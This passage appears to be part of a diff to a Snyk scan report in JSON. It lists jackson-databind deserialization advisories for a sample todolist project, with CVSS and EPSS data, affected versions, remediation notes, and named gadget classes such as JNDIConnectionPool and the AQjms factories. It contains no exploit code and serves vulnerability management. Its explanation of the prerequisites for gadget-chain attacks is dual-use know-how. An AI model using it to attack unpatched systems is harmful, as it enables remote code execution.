8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", + "epssDetails": { + "percentile": "0.91500", + "probability": "0.03413", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14195" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mc6h-4qgp-37qh" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-14T14:48:40.820120Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-14T14:45:09Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-14T15:32:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.570033Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Topsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2688", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.405517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.94931", + "probability": "0.10105", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14060" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-j823-4qch-3rgm" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T10:29:46.691157Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:23:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:46:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.574354Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2698", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.989304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.91508", + "probability": "0.03404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14061" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c2q3-4qrh-fm48" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T11:03:46.232208Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:59:39Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:45:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.565244Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.009523Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.45827", + "probability": "0.00116", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14439" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.478840Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:35.581531Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "className": "SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2814", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Kamimuka/cve-2020-24616-poc", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.282990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is 